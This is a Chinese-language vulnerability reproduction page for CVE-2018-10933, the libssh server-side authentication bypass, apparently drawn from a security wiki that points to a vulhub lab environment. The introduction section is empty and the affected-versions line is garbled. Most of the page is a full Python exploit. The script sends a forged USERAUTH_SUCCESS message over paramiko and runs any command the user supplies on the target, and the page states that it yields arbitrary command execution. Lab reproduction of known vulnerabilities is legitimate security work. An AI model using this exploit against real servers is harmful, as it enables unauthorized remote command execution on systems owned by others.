(CVE-2018-10933)Libssh 服务端权限认证绕过漏洞¶
一、漏洞简介¶
二、漏洞影响¶
libssh的server-side state machine 0.7.6之前版本和0.8.4
三、复现过程¶
CVE-2018-10933.py #!/usr/bin/env python3 import sys import paramiko import socket import logging logging.basicConfig(stream=sys.stdout, level=logging.DEBUG) bufsize = 2048 def execute(hostname, port, command): sock = socket.socket() try: sock.connect((hostname, int(port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) client = transport.open_session(timeout=10) client.exec_command(command) # stdin = client.makefile("wb", bufsize) stdout = client.makefile("rb", bufsize) stderr = client.makefile_stderr("rb", bufsize) output = stdout.read() error = stderr.read() stdout.close() stderr.close() return (output+error).decode() except paramiko.SSHException as e: logging.exception(e) logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable") except socket.error: logging.debug("Unable to connect.") return None if __name__ == '__main__': print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
使用python3执行,即可在目标服务器上执行任意命令:
Libssh服务端权限认证绕过漏洞/media/rId24.png)
参考链接¶
https://vulhub.org/#/environments/libssh/CVE-2018-10933/